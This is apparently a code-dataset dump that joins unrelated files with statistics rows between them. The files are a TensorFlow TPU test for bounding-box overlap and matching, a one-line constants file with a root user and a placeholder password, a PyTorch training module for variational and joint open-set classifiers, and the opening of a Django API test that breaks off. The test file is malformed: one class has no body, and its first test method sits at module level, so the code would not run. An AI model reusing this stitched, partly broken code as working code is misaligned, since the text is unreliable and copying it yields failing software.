    self._check_top_k(
        [[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5], [7.0, 4.0, 9.5, 6.5]],
         [[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0], [4.0, 1.0, 7.0, 4.0]]],
        [[0.9, 0.7, 0.5], [0.11, 0.22, 0.33]],
        [[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5]],
         [[4.0, 1.0, 7.0, 4.0], [5.0, 6.0, 5.1, 6.0]]],
        [[0.9, 0.7], [0.33, 0.22]])
class BboxeOverlapTest(tf.test.TestCase):

  def _bbox_overlap_on_tpu(self, boxes_np, gt_boxes_np):
    """Runs box_ops.bbox_overlap under a TPU strategy scope, returns numpy."""
    strategy = tf.distribute.experimental.TPUStrategy()
    with strategy.scope():
      boxes = tf.constant(boxes_np)
      gt_boxes = tf.constant(gt_boxes_np)
      iou = box_ops.bbox_overlap(boxes=boxes, gt_boxes=gt_boxes)
    return iou.numpy()

  def testBBoxeOverlapOpCorrectness(self):
    boxes_np = np.array(
        [[[0, 0, 0.1, 1], [0, 0.2, 0.2, 1.2], [0, 0.3, 0.3, 1.3],
          [0, 0.5, 0.4, 1.5], [0, 0.7, 0.5, 1.7], [0, 0.9, 0.6, 1.9],
          [0, 0.1, 0.1, 1.1], [0, 0.3, 0.7, 1.3], [0, 0.9, 2, 1.9]],
         [[0, 0, 1, 0.2], [0, 0.2, 0.5, 1.2], [0, 0.4, 0.9, 1.4],
          [0, 0.6, 1.1, 1.6], [0, 0.8, 1.2, 1.8], [0, 1, 1.5, 2],
          [0, 0.5, 1, 1], [0.5, 0.8, 1, 1.8], [-1, -1, -1, -1]]],
        dtype=np.float32)
    gt_boxes_np = np.array(
        [[[0, 0.1, 0.1, 1.1], [0, 0.3, 0.7, 1.3], [0, 0.9, 2, 1.9]],
         [[0, 0.5, 1, 1], [0.5, 0.8, 1, 1.8], [-1, -1, -1, -1]]],
        dtype=np.float32)
    iou = self._bbox_overlap_on_tpu(boxes_np, gt_boxes_np)
    self.assertEqual(iou.shape, (2, 9, 3))
    # Each box should best match its most-overlapping ground-truth box.
    self.assertAllEqual(
        np.argmax(iou, axis=2),
        [[0, 0, 1, 1, 1, 2, 0, 1, 2], [0, 0, 0, 0, 1, 1, 0, 1, 0]])

  def testBBoxeOverlapOpCheckShape(self):
    batch_size = 2
    rpn_post_nms_topn = 2000
    gt_max_instances = 100
    boxes_np = np.random.rand(batch_size, rpn_post_nms_topn,
                              4).astype(np.float32)
    gt_boxes_np = np.random.rand(batch_size, gt_max_instances,
                                 4).astype(np.float32)
    iou = self._bbox_overlap_on_tpu(boxes_np, gt_boxes_np)
    self.assertEqual(iou.shape,
                     (batch_size, rpn_post_nms_topn, gt_max_instances))

  def testBBoxeOverlapOpCorrectnessWithNegativeData(self):
    boxes_np = np.array(
        [[[0, -0.01, 0.1, 1.1], [0, 0.2, 0.2, 5.0],
          [0, -0.01, 0.1, 1.], [-1, -1, -1, -1]]], dtype=np.float32)
    # Compared with itself: the diagonal is ~1 and the padded (-1) box
    # yields an IoU of -1 against everything.
    iou = self._bbox_overlap_on_tpu(boxes_np, boxes_np)
    expected = np.array([[[0.99999994, 0.0917431, 0.9099099, -1.],
                          [0.0917431, 1., 0.08154944, -1.],
                          [0.9099099, 0.08154944, 1., -1.],
                          [-1., -1., -1., -1.]]])
    self.assertAllClose(expected, iou)
class BoxMatchingTest(tf.test.TestCase):
def test_box_matching_single(self):
  """Checks box_ops.box_matching on a single-image batch.

  Each of the four proposal boxes should be matched to the ground-truth
  box it overlaps most; the all -1 ground-truth row is padding.
  """
  # Four proposal boxes on a diagonal; consecutive boxes half-overlap.
  boxes_np = np.array(
      [[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
        [5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]]])
  boxes = tf.constant(boxes_np, dtype=tf.float32)
  # gt boxes: one far box, one identical to proposal 1, one padded (-1).
  gt_boxes_np = np.array(
      [[[10, 10, 15, 15], [2.5, 2.5, 7.5, 7.5],
        [-1, -1, -1, -1]]])
  gt_boxes = tf.constant(gt_boxes_np, dtype=tf.float32)
  gt_classes_np = np.array([[2, 10, -1]])
  gt_classes = tf.constant(gt_classes_np, dtype=tf.int32)
  # Expected: proposals 0-2 match gt box 1, proposal 3 matches gt box 0.
  matched_gt_boxes_np = np.array(
      [[[2.5, 2.5, 7.5, 7.5],
        [2.5, 2.5, 7.5, 7.5],
        [2.5, 2.5, 7.5, 7.5],
        [10, 10, 15, 15]]])
  matched_gt_classes_np = np.array([[10, 10, 10, 2]])
  matched_gt_indices_np = np.array([[1, 1, 1, 0]])
  # 0.142857... = 1/7, the IoU of two 5x5 boxes offset by 2.5 on each axis.
  matched_iou_np = np.array(
      [[0.142857142857, 1.0, 0.142857142857, 0.142857142857]])
  # Padded gt columns are expected to carry IoU -1.
  iou_np = np.array(
      [[[0, 0.142857142857, -1.0],
        [0, 1.0, -1.0],
        [0, 0.142857142857, -1.0],
        [0.142857142857, 0, -1.0]]])
  # Runs on TPU.
  strategy = tf.distribute.experimental.TPUStrategy()
  with strategy.scope():
    (matched_gt_boxes_tpu, matched_gt_classes_tpu,
     matched_gt_indices_tpu, matched_iou_tpu, iou_tpu) = (
         box_ops.box_matching(boxes, gt_boxes, gt_classes))
  # Runs on CPU.
  (matched_gt_boxes_cpu, matched_gt_classes_cpu,
   matched_gt_indices_cpu, matched_iou_cpu, iou_cpu) = (
       box_ops.box_matching(boxes, gt_boxes, gt_classes))
  # consistency: TPU and CPU paths must agree on every output.
  self.assertNDArrayNear(
      matched_gt_boxes_tpu.numpy(), matched_gt_boxes_cpu.numpy(), 1e-5)
  self.assertAllEqual(
      matched_gt_classes_tpu.numpy(), matched_gt_classes_cpu.numpy())
  self.assertAllEqual(
      matched_gt_indices_tpu.numpy(), matched_gt_indices_cpu.numpy())
  self.assertNDArrayNear(
      matched_iou_tpu.numpy(), matched_iou_cpu.numpy(), 1e-5)
  self.assertNDArrayNear(
      iou_tpu.numpy(), iou_cpu.numpy(), 1e-5)
  # correctness: outputs must match the hand-computed expectations above.
  self.assertNDArrayNear(
      matched_gt_boxes_tpu.numpy(), matched_gt_boxes_np, 1e-5)
  self.assertAllEqual(
      matched_gt_classes_tpu.numpy(), matched_gt_classes_np)
  self.assertAllEqual(
      matched_gt_indices_tpu.numpy(), matched_gt_indices_np)
  self.assertNDArrayNear(
      matched_iou_tpu.numpy(), matched_iou_np, 1e-5)
  self.assertNDArrayNear(
      iou_tpu.numpy(), iou_np, 1e-5)
  def test_box_matching_single_no_gt(self):
    """Tests box_matching for one image whose ground truth is all padding.

    Every gt box and class is -1 (padding), so each anchor box is expected
    to be unmatched: matched boxes/classes of 0, matched indices and IoU of
    -1. First checks that TPU and CPU executions agree, then checks both
    against the hand-written NumPy references.
    """
    # Four anchor boxes in [ymin, xmin, ymax, xmax] order, batch size 1.
    boxes_np = np.array(
        [[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
          [5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]]])
    boxes = tf.constant(boxes_np, dtype=tf.float32)
    # All gt entries are -1, i.e. pure padding: no valid ground truth.
    gt_boxes_np = np.array(
        [[[-1, -1, -1, -1],
          [-1, -1, -1, -1],
          [-1, -1, -1, -1]]])
    gt_boxes = tf.constant(gt_boxes_np, dtype=tf.float32)
    gt_classes_np = np.array([[-1, -1, -1]])
    gt_classes = tf.constant(gt_classes_np, dtype=tf.int32)
    # Expected outputs: zeros for matched boxes/classes, -1 for
    # indices/IoU, signalling "no match" for every anchor box.
    matched_gt_boxes_np = np.array(
        [[[0, 0, 0, 0],
          [0, 0, 0, 0],
          [0, 0, 0, 0],
          [0, 0, 0, 0]]])
    matched_gt_classes_np = np.array([[0, 0, 0, 0]])
    matched_gt_indices_np = np.array([[-1, -1, -1, -1]])
    matched_iou_np = np.array([[-1, -1, -1, -1]])
    iou_np = np.array(
        [[[-1, -1, -1],
          [-1, -1, -1],
          [-1, -1, -1],
          [-1, -1, -1]]])
    # Runs on TPU.
    strategy = tf.distribute.experimental.TPUStrategy()
    with strategy.scope():
      (matched_gt_boxes_tpu, matched_gt_classes_tpu,
       matched_gt_indices_tpu, matched_iou_tpu, iou_tpu) = (
           box_ops.box_matching(boxes, gt_boxes, gt_classes))
    # Runs on CPU (default device, outside the TPU strategy scope).
    (matched_gt_boxes_cpu, matched_gt_classes_cpu,
     matched_gt_indices_cpu, matched_iou_cpu, iou_cpu) = (
         box_ops.box_matching(boxes, gt_boxes, gt_classes))
    # consistency: TPU and CPU results must agree.
    self.assertNDArrayNear(
        matched_gt_boxes_tpu.numpy(), matched_gt_boxes_cpu.numpy(), 1e-5)
    self.assertAllEqual(
        matched_gt_classes_tpu.numpy(), matched_gt_classes_cpu.numpy())
    self.assertAllEqual(
        matched_gt_indices_tpu.numpy(), matched_gt_indices_cpu.numpy())
    self.assertNDArrayNear(
        matched_iou_tpu.numpy(), matched_iou_cpu.numpy(), 1e-5)
    self.assertNDArrayNear(
        iou_tpu.numpy(), iou_cpu.numpy(), 1e-5)
    # correctness: TPU results must match the NumPy references.
    self.assertNDArrayNear(
        matched_gt_boxes_tpu.numpy(), matched_gt_boxes_np, 1e-5)
    self.assertAllEqual(
        matched_gt_classes_tpu.numpy(), matched_gt_classes_np)
    self.assertAllEqual(
        matched_gt_indices_tpu.numpy(), matched_gt_indices_np)
    self.assertNDArrayNear(
        matched_iou_tpu.numpy(), matched_iou_np, 1e-5)
    self.assertNDArrayNear(
        iou_tpu.numpy(), iou_np, 1e-5)
  def test_box_matching_batch(self):
    """Tests box_matching on a batch of two images.

    Image 0 has two valid gt boxes plus one padded entry; image 1 is all
    padding. Expected values for image 0 were derived by hand (0.142857...
    is the 1/7 IoU of two half-overlapping 5x5 boxes); image 1 should yield
    the all-unmatched outputs (zeros / -1). Checks TPU/CPU consistency,
    then correctness against the NumPy references.
    """
    boxes_np = np.array(
        [[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
          [5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]],
         [[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
          [5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]]])
    boxes = tf.constant(boxes_np, dtype=tf.float32)
    # gt entries of -1 denote padding; image 1 has no valid ground truth.
    gt_boxes_np = np.array(
        [[[10, 10, 15, 15], [2.5, 2.5, 7.5, 7.5], [-1, -1, -1, -1]],
         [[-1, -1, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]])
    gt_boxes = tf.constant(gt_boxes_np, dtype=tf.float32)
    gt_classes_np = np.array([[2, 10, -1], [-1, -1, -1]])
    gt_classes = tf.constant(gt_classes_np, dtype=tf.int32)
    # Expected matches per anchor box (image 0: gt 1 for the first three
    # boxes, gt 0 for the last; image 1: unmatched everywhere).
    matched_gt_boxes_np = np.array(
        [[[2.5, 2.5, 7.5, 7.5],
          [2.5, 2.5, 7.5, 7.5],
          [2.5, 2.5, 7.5, 7.5],
          [10, 10, 15, 15]],
         [[0, 0, 0, 0],
          [0, 0, 0, 0],
          [0, 0, 0, 0],
          [0, 0, 0, 0]]])
    matched_gt_classes_np = np.array(
        [[10, 10, 10, 2],
         [0, 0, 0, 0]])
    matched_gt_indices_np = np.array(
        [[1, 1, 1, 0],
         [-1, -1, -1, -1]])
    matched_iou_np = np.array(
        [[0.142857142857, 1.0, 0.142857142857, 0.142857142857],
         [-1, -1, -1, -1]])
    # Full pairwise IoU matrix; padded gt columns carry -1.
    iou_np = np.array(
        [[[0, 0.142857142857, -1.0],
          [0, 1.0, -1.0],
          [0, 0.142857142857, -1.0],
          [0.142857142857, 0, -1.0]],
         [[-1, -1, -1],
          [-1, -1, -1],
          [-1, -1, -1],
          [-1, -1, -1]]])
    # Runs on TPU.
    strategy = tf.distribute.experimental.TPUStrategy()
    with strategy.scope():
      (matched_gt_boxes_tpu, matched_gt_classes_tpu,
       matched_gt_indices_tpu, matched_iou_tpu, iou_tpu) = (
           box_ops.box_matching(boxes, gt_boxes, gt_classes))
    # Runs on CPU (default device, outside the TPU strategy scope).
    (matched_gt_boxes_cpu, matched_gt_classes_cpu,
     matched_gt_indices_cpu, matched_iou_cpu, iou_cpu) = (
         box_ops.box_matching(boxes, gt_boxes, gt_classes))
    # consistency: TPU and CPU results must agree.
    self.assertNDArrayNear(
        matched_gt_boxes_tpu.numpy(), matched_gt_boxes_cpu.numpy(), 1e-5)
    self.assertAllEqual(
        matched_gt_classes_tpu.numpy(), matched_gt_classes_cpu.numpy())
    self.assertAllEqual(
        matched_gt_indices_tpu.numpy(), matched_gt_indices_cpu.numpy())
    self.assertNDArrayNear(
        matched_iou_tpu.numpy(), matched_iou_cpu.numpy(), 1e-5)
    self.assertNDArrayNear(
        iou_tpu.numpy(), iou_cpu.numpy(), 1e-5)
    # correctness: TPU results must match the NumPy references.
    self.assertNDArrayNear(
        matched_gt_boxes_tpu.numpy(), matched_gt_boxes_np, 1e-5)
    self.assertAllEqual(
        matched_gt_classes_tpu.numpy(), matched_gt_classes_np)
    self.assertAllEqual(
        matched_gt_indices_tpu.numpy(), matched_gt_indices_np)
    self.assertNDArrayNear(
        matched_iou_tpu.numpy(), matched_iou_np, 1e-5)
    self.assertNDArrayNear(
        iou_tpu.numpy(), iou_np, 1e-5)
# Standard TensorFlow test entry point: discover and run all tests in this
# module when it is executed as a script.
if __name__ == '__main__':
  tf.test.main()
| 42.754651 | 81 | 0.600098 | 5,722 | 36,769 | 3.623908 | 0.048235 | 0.019194 | 0.014323 | 0.014853 | 0.836854 | 0.812645 | 0.800347 | 0.790461 | 0.776717 | 0.767988 | 0 | 0.11406 | 0.238652 | 36,769 | 859 | 82 | 42.804424 | 0.62667 | 0.030216 | 0 | 0.744428 | 0 | 0 | 0.000225 | 0 | 0 | 0 | 0 | 0 | 0.157504 | 1 | 0.069837 | false | 0 | 0.004458 | 0.001486 | 0.104012 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f22926bc6de47c6de6f7c6fbad88ec089cbe7761 | 40 | py | Python | CrossRoads/Constant.py | Bamgm14/CrossRoadsCTF | a49840f94dc90874282ccb49a8be27b51aa1f097 | [
"MIT"
] | null | null | null | CrossRoads/Constant.py | Bamgm14/CrossRoadsCTF | a49840f94dc90874282ccb49a8be27b51aa1f097 | [
"MIT"
] | null | null | null | CrossRoads/Constant.py | Bamgm14/CrossRoadsCTF | a49840f94dc90874282ccb49a8be27b51aa1f097 | [
"MIT"
] | 1 | 2021-11-27T05:43:23.000Z | 2021-11-27T05:43:23.000Z | user="root"
password=<New>
ip="0.0.0.0"
| 10 | 14 | 0.625 | 9 | 40 | 2.777778 | 0.666667 | 0.24 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 0.075 | 40 | 3 | 15 | 13.333333 | 0.567568 | 0 | 0 | 0 | 0 | 0 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.333333 | 0 | null | null | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
f23c65d40cbe6f548c55b4f5beb397a9485e1f36 | 13,430 | py | Python | lib/Training/train.py | MrtnMndt/Deep_Openset_Recognition_through_Uncertainty | 88ae1d5e36457ad53223c0a3a461582aacbb34aa | [
"MIT"
] | 73 | 2019-10-31T13:46:02.000Z | 2022-03-31T04:40:32.000Z | lib/Training/train.py | MrtnMndt/Deep_Openset_Recognition_through_Uncertainty | 88ae1d5e36457ad53223c0a3a461582aacbb34aa | [
"MIT"
] | 4 | 2019-11-19T16:31:02.000Z | 2021-03-26T08:17:35.000Z | lib/Training/train.py | MrtnMndt/Deep_Openset_Recognition_through_Uncertainty | 88ae1d5e36457ad53223c0a3a461582aacbb34aa | [
"MIT"
] | 21 | 2019-11-20T01:38:52.000Z | 2022-02-24T12:29:29.000Z | import time
import torch
from lib.Utility.metrics import AverageMeter
from lib.Utility.metrics import accuracy
def train(Dataset, model, criterion, epoch, optimizer, writer, device, args):
"""
Trains/updates the model for one epoch on the training dataset.
Parameters:
Dataset (torch.utils.data.Dataset): The dataset
model (torch.nn.module): Model to be trained
criterion (torch.nn.criterion): Loss function
epoch (int): Continuous epoch counter
optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
writer (tensorboard.SummaryWriter): TensorBoard writer instance
device (str): device name where data is transferred to
args (dict): Dictionary of (command line) arguments.
Needs to contain print_freq (int), denoising_noise_value (float) and var_beta (float).
"""
# Create instances to accumulate losses etc.
losses = AverageMeter()
batch_time = AverageMeter()
data_time = AverageMeter()
top1 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
# train
for i, (inp, target) in enumerate(Dataset.train_loader):
inp = inp.to(device)
target = target.to(device)
# measure data loading time
data_time.update(time.time() - end)
# compute model forward
output = model(inp)
# calculate loss
loss = criterion(output, target)
# record precision/accuracy and losses
prec1 = accuracy(output, target)[0]
top1.update(prec1.item(), inp.size(0))
losses.update(loss.item(), inp.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print progress
if i % args.print_freq == 0:
print('Training: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=top1))
# TensorBoard summary logging
writer.add_scalar('training/train_precision@1', top1.avg, epoch)
writer.add_scalar('training/train_class_loss', losses.avg, epoch)
writer.add_scalar('training/train_average_loss', losses.avg, epoch)
print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
def train_var(Dataset, model, criterion, epoch, optimizer, writer, device, args):
    """
    Trains/updates the variational model for one epoch on the training dataset.

    Parameters:
        Dataset (torch.utils.data.Dataset): The dataset
        model (torch.nn.module): Variational model to be trained; its forward
            is expected to return (output_samples, mu, std).
        criterion (torch.nn.criterion): Loss function returning the tuple
            (classification loss, KL divergence loss).
        epoch (int): Continuous epoch counter
        optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
        writer (tensorboard.SummaryWriter): TensorBoard writer instance
        device (str): device name where data is transferred to
        args (dict): Dictionary of (command line) arguments.
            Needs to contain print_freq (int) and var_beta (float), the
            weight of the KL term in the optimized loss.
    """
    # Create instances to accumulate losses etc.
    cl_losses = AverageMeter()
    kld_losses = AverageMeter()
    losses = AverageMeter()
    batch_time = AverageMeter()
    data_time = AverageMeter()
    top1 = AverageMeter()

    # switch to train mode
    model.train()

    end = time.time()

    # train
    for i, (inp, target) in enumerate(Dataset.train_loader):
        inp = inp.to(device)
        target = target.to(device)

        # measure data loading time
        data_time.update(time.time() - end)

        # compute model forward; output_samples holds one prediction per
        # variational sample (leading sample dimension).
        output_samples, mu, std = model(inp)

        # calculate loss
        cl_loss, kld_loss = criterion(output_samples, target, mu, std, device)

        # add the individual loss components together and weight the KL term.
        loss = cl_loss + args.var_beta * kld_loss

        # take mean to compute accuracy. Note if variational samples are 1 this only gets rid of a dummy dimension.
        output = torch.mean(output_samples, dim=0)

        # record precision/accuracy and losses
        prec1 = accuracy(output, target)[0]
        top1.update(prec1.item(), inp.size(0))
        # NOTE: the recorded total is the *unweighted* cl + kld sum; only
        # the optimized loss above applies the var_beta weighting.
        losses.update((cl_loss + kld_loss).item(), inp.size(0))
        cl_losses.update(cl_loss.item(), inp.size(0))
        kld_losses.update(kld_loss.item(), inp.size(0))

        # compute gradient and do SGD step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()

        # print progress
        if i % args.print_freq == 0:
            print('Training: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Class Loss {cl_loss.val:.4f} ({cl_loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
                  'KL {KLD_loss.val:.4f} ({KLD_loss.avg:.4f})'.format(
                      epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
                      data_time=data_time, loss=losses, cl_loss=cl_losses, top1=top1, KLD_loss=kld_losses))

    # TensorBoard summary logging
    writer.add_scalar('training/train_precision@1', top1.avg, epoch)
    writer.add_scalar('training/train_class_loss', cl_losses.avg, epoch)
    writer.add_scalar('training/train_average_loss', losses.avg, epoch)
    writer.add_scalar('training/train_KLD', kld_losses.avg, epoch)

    print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
def train_joint(Dataset, model, criterion, epoch, optimizer, writer, device, args):
    """
    Trains/updates the joint classification/reconstruction model for one
    epoch on the training dataset.

    Parameters:
        Dataset (torch.utils.data.Dataset): The dataset
        model (torch.nn.module): Model to be trained; its forward is expected
            to return (class_output, recon_output).
        criterion (torch.nn.criterion): Loss function returning the tuple
            (classification loss, reconstruction loss).
        epoch (int): Continuous epoch counter
        optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
        writer (tensorboard.SummaryWriter): TensorBoard writer instance
        device (str): device name where data is transferred to
        args (dict): Dictionary of (command line) arguments.
            Needs to contain print_freq (int).
    """
    # Create instances to accumulate losses etc.
    class_losses = AverageMeter()
    recon_losses = AverageMeter()
    losses = AverageMeter()
    batch_time = AverageMeter()
    data_time = AverageMeter()
    top1 = AverageMeter()

    # switch to train mode
    model.train()

    end = time.time()

    # train
    for i, (inp, target) in enumerate(Dataset.train_loader):
        inp = inp.to(device)
        class_target = target.to(device)
        # autoencoder-style reconstruction target is the input itself
        recon_target = inp

        # measure data loading time
        data_time.update(time.time() - end)

        # compute model forward
        class_output, recon_output = model(inp)

        # calculate loss
        class_loss, recon_loss = criterion(class_output, class_target, recon_output, recon_target)

        # add the individual loss components together
        loss = class_loss + recon_loss

        # record precision/accuracy and losses
        prec1 = accuracy(class_output, class_target)[0]
        top1.update(prec1.item(), inp.size(0))
        losses.update((class_loss + recon_loss).item(), inp.size(0))
        class_losses.update(class_loss.item(), inp.size(0))
        recon_losses.update(recon_loss.item(), inp.size(0))

        # compute gradient and do SGD step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()

        # print progress
        if i % args.print_freq == 0:
            print('Training: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Class Loss {cl_loss.val:.4f} ({cl_loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
                  'Recon Loss {recon_loss.val:.4f} ({recon_loss.avg:.4f})'.format(
                      epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
                      data_time=data_time, loss=losses,
                      cl_loss=class_losses, top1=top1, recon_loss=recon_losses))

    # TensorBoard summary logging
    writer.add_scalar('training/train_precision@1', top1.avg, epoch)
    writer.add_scalar('training/train_average_loss', losses.avg, epoch)
    writer.add_scalar('training/train_class_loss', class_losses.avg, epoch)
    writer.add_scalar('training/train_recon_loss', recon_losses.avg, epoch)

    print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
def train_var_joint(Dataset, model, criterion, epoch, optimizer, writer, device, args):
    """
    Trains/updates the joint variational classification/reconstruction model
    for one epoch on the training dataset.

    Parameters:
        Dataset (torch.utils.data.Dataset): The dataset
        model (torch.nn.module): Model to be trained; its forward is expected
            to return (class_samples, recon_samples, mu, std).
        criterion (torch.nn.criterion): Loss function returning the tuple
            (classification loss, reconstruction loss, KL divergence loss).
        epoch (int): Continuous epoch counter
        optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
        writer (tensorboard.SummaryWriter): TensorBoard writer instance
        device (str): device name where data is transferred to
        args (dict): Dictionary of (command line) arguments.
            Needs to contain print_freq (int) and var_beta (float), the
            weight of the KL term in the optimized loss.
    """
    # Create instances to accumulate losses etc.
    class_losses = AverageMeter()
    recon_losses = AverageMeter()
    kld_losses = AverageMeter()
    losses = AverageMeter()
    batch_time = AverageMeter()
    data_time = AverageMeter()
    top1 = AverageMeter()

    # switch to train mode
    model.train()

    end = time.time()

    # train
    for i, (inp, target) in enumerate(Dataset.train_loader):
        inp = inp.to(device)
        class_target = target.to(device)
        # autoencoder-style reconstruction target is the input itself
        recon_target = inp

        # measure data loading time
        data_time.update(time.time() - end)

        # compute model forward; class/recon samples carry one prediction
        # per variational sample (leading sample dimension).
        class_samples, recon_samples, mu, std = model(inp)

        # calculate loss
        class_loss, recon_loss, kld_loss = criterion(class_samples, class_target, recon_samples, recon_target,
                                                     mu, std, device)

        # add the individual loss components together and weight the KL term.
        loss = class_loss + recon_loss + args.var_beta * kld_loss

        # take mean to compute accuracy. Note if variational samples are 1 this only gets rid of a dummy dimension.
        output = torch.mean(class_samples, dim=0)

        # record precision/accuracy and losses
        prec1 = accuracy(output, class_target)[0]
        top1.update(prec1.item(), inp.size(0))
        # NOTE: the recorded total is the *unweighted* sum; only the
        # optimized loss above applies the var_beta weighting to the KL.
        losses.update((class_loss + recon_loss + kld_loss).item(), inp.size(0))
        class_losses.update(class_loss.item(), inp.size(0))
        recon_losses.update(recon_loss.item(), inp.size(0))
        kld_losses.update(kld_loss.item(), inp.size(0))

        # compute gradient and do SGD step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()

        # print progress
        if i % args.print_freq == 0:
            print('Training: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Class Loss {cl_loss.val:.4f} ({cl_loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
                  'Recon Loss {recon_loss.val:.4f} ({recon_loss.avg:.4f})\t'
                  'KL {KLD_loss.val:.4f} ({KLD_loss.avg:.4f})'.format(
                      epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
                      data_time=data_time, loss=losses,
                      cl_loss=class_losses, top1=top1, recon_loss=recon_losses, KLD_loss=kld_losses))

    # TensorBoard summary logging
    writer.add_scalar('training/train_precision@1', top1.avg, epoch)
    writer.add_scalar('training/train_average_loss', losses.avg, epoch)
    writer.add_scalar('training/train_KLD', kld_losses.avg, epoch)
    writer.add_scalar('training/train_class_loss', class_losses.avg, epoch)
    writer.add_scalar('training/train_recon_loss', recon_losses.avg, epoch)

    print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
| 38.481375 | 115 | 0.627476 | 1,726 | 13,430 | 4.75029 | 0.086906 | 0.026345 | 0.029272 | 0.044884 | 0.963654 | 0.949384 | 0.943896 | 0.929748 | 0.920234 | 0.920234 | 0 | 0.015651 | 0.25309 | 13,430 | 348 | 116 | 38.591954 | 0.801715 | 0.294564 | 0 | 0.77193 | 0 | 0.023392 | 0.190331 | 0.071592 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023392 | false | 0 | 0.023392 | 0 | 0.046784 | 0.070175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f292fac8161bfac7e1e8799b3d11c388ee5b0cc6 | 11,416 | py | Python | api/v1/words_in_sentences/tests/test_views.py | FatliTalk/learnenglish | f0393346f2e696b2af542c05e5005d2495f00e37 | [
"MIT"
] | 1 | 2021-10-06T12:40:28.000Z | 2021-10-06T12:40:28.000Z | api/v1/words_in_sentences/tests/test_views.py | FatliTalk/learnenglish | f0393346f2e696b2af542c05e5005d2495f00e37 | [
"MIT"
] | null | null | null | api/v1/words_in_sentences/tests/test_views.py | FatliTalk/learnenglish | f0393346f2e696b2af542c05e5005d2495f00e37 | [
"MIT"
] | null | null | null | from django.urls import reverse
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.test import APITestCase
from words_in_sentences.models import Sentence
from words_in_sentences.models import Tag
class SentenceViewTests(APITestCase):
    """CRUD tests for the Sentence API viewset.

    Covers list/create/retrieve/update/destroy plus the permission rules:
    anonymous users cannot create, and only the sentence's author may
    update or delete it.
    """

    @classmethod
    def setUpTestData(cls):
        # Shared, read-only fixture user created once per test class.
        cls.user = get_user_model().objects.create_user(
            username='Jake',
